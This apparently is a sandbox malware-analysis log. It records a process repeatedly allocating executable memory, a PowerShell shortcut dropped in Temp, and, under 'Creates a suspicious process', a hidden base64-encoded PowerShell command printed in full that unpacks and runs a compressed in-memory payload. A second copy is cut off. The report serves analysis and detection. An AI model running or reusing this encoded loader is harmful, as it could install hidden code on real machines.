NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02901000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02902000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02891000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02892000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02893000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02894000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02895000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02896000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02897000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02898000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02899000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0289a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0289b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0289c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0289d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0289e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0289f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8AUABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8A